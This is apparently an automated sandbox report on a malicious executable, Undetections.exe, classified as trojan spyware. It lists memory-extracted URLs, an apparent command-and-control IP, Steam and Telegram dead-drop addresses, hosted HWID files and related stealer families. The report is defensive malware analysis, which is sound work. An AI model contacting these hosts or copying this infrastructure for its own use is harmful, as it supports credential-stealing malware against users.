                                                  https://fontawesome.comhttps://fontawesome.comFontUndetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://t.me/t8jmhlspoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                      		high
                                                      https://fontawesome.comUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4110420914.000000000745E000.00000004.00000020.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003AD5000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4108901419.0000000007237000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://95.217.212.139IJKRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                            		high
                                                            http://www.galapagosdesign.com/DPleaseUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://foo/fonts/fa-brands-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                              		high
                                                              http://www.zhongyicts.com.cnUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://95.217.212.139/(RegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUndetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                  		high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EHCBAAAF.4.drfalse
                                                                    		high
                                                                    http://ashjghas.ucoz.netdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/EHCBAAAF.4.drfalse
                                                                      		high
                                                                      http://www.carterandcone.comlUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                        		high
                                                                        http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        http://foo/bar/fonts/fa-brands-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                          		high
                                                                          http://foo/fonts/fa-regular-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                            		high
                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                              		high
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDGCAAFBF.4.drfalse
                                                                                		high
                                                                                http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                http://foo/bar/fonts/fa-brands-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://steamcommunity.com/profiles/76561199662282318https://t.me/t8jmhlCristinaspoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://universalbeure.usite.proUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://universalbeure.usite.proUndetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.founder.com.cn/cn/bTheUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://95.217.212.139/yRegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://95.217.212.139FIJRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                          		high
                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119966228231876561199662282318[1].htm.4.drfalse
                                                                                            		high
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                              		high
                                                                                              http://www.typography.netDUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                		high
                                                                                                https://95.217.212.139FHIRegAsm.exe, 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                  		high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                    		high
                                                                                                    https://95.217.212.139/oamingRegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.fonts.comUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.sandoll.co.krUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://steamcommunity.com/workshop/RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/legal/RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                          		high
                                                                                                          https://discord.gg/tZZe4x6PH6Undetections.exefalse
                                                                                                          • 1%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://95.217.212.139/mozglue.dllARegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtt-kqUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://95.217.212.139/4RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://95.217.212.139/:RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                              		high
                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoEHCBAAAF.4.drfalse
                                                                                                                		high
                                                                                                                https://www.siticoneframework.com/pricing.htmlFSoftwareUndetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • 1%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://95.217.212.139/8RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://store.steampowered.com/76561199662282318[1].htm.4.drfalse
                                                                                                                  		high
                                                                                                                  https://95.217.212.139/KRegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://foo/fonts/fa-regular-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		low
                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.founder.com.cn/cnUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://95.217.212.139/TRegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                      		high
                                                                                                                      https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://95.217.212.139/YRegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engliRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                            		high
                                                                                                                            https://95.217.212.139/EBKJKFIEBGDGDAAECGHDHRegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://foo/bar/fonts/fa-solid-900.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		low
                                                                                                                            https://95.217.212.139/eRegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://foo/bar/fonts/fa-solid-900.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		low
                                                                                                                            https://store.steampowered.com/mobileRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                              		high
                                                                                                                              https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtt-kqUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://foo/bar/fonts/fa-regular-400.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		low
                                                                                                                                https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                                  		high
                                                                                                                                  https://universalbeure.usite.pro/STLprograms/NEW/hwid.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttfdUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		low
                                                                                                                                    https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtdUndetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                                        		high
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                                          		high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                                            		high
                                                                                                                                            http://www.sajatypeworks.comUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.founder.com.cn/cn/cTheUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://95.217.212.139/rPRRegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://steamcommunity.com/profiles/76561199662282318/badgesRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                                                                                                              		high

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              104.102.129.112
                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                              		16625AKAMAI-ASUSfalse
                                                                                                                                              172.253.115.113
                                                                                                                                              		google.comUnited States
                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                              193.109.246.100
                                                                                                                                              		universalbeure.usite.proVirgin Islands (BRITISH)
                                                                                                                                              		204343COMPUBYTE-ASRUfalse
                                                                                                                                              95.217.212.139
                                                                                                                                              		unknownGermany
                                                                                                                                              		24940HETZNER-ASDEfalse

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                              Analysis ID:1423660
                                                                                                                                              Start date and time:2024-04-10 08:55:13 +02:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 12m 15s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:Undetections.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/28@4/4
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                              • Number of executed functions: 284
                                                                                                                                              • Number of non-executed functions: 14
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                              Warnings

                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              08:56:06API Interceptor12534422x Sleep call for process: Undetections.exe modified
                                                                                                                                              08:56:21API Interceptor1x Sleep call for process: RegAsm.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              104.102.129.112SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                    EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                          file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                            PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                  Domains

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  steamcommunity.comSecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.194.234.100
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.61.62.148
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.61.62.148
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.194.234.100
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.194.234.100
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.61.62.148
                                                                                                                                                                  CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                                                                  • 23.194.234.100
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.194.234.100
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 23.194.234.100

                                                                                                                                                                  ASNs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  COMPUBYTE-ASRUT4IoJqcAwY.exeGet hashmaliciousNymaim, SmokeLoader, Zealer Stealer, onlyLoggerBrowse
                                                                                                                                                                  • 193.109.246.62
